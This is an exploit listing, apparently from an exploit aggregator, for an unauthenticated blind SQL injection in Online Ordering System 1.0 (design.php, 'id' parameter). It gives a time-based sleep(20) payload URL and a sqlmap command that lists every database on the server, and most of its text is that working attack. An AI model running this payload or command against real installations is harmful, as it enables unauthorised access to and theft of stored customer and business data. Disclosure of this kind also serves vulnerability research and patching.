Exploit for Online Ordering System 1.0 SQL Injection

Name: Exploit for Online Ordering System 1.0 SQL Injection
Rating: 5 (131 reviews)

2021-03-04 | CVSS 0.0

## https://sploitus.com/exploit?id=PACKETSTORM:161655
# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)  
# Date: 2021-03-04  
# Exploit Author: Suraj Bhosale  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html  
# Version: v1.0  
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9  
# Vulnerable Parameter: id  
  
*Steps to Reproduce:*  
1) Visit  
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.  
2) Now fire up the following command into SQLMAP.  
  
CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9  
<http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*  
--batch --dbs  
  
3) Using the above command we will get the name of all the database.